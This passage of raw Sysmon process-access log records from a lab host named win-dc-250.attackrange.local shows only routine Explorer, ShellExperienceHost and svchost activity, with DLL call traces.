indows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8de9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7f06|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a54|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9af1|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6747|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9ac5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6747|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6712|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a54|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9af1|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6747|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9ac5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6747|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6712|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a54|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9af1|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6747|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9ac5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6747|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6712|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.279{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.279{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.279{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.279{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.279{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.279{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.279{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a54|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9af1|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3ae7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.279{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9ac5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3ae7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 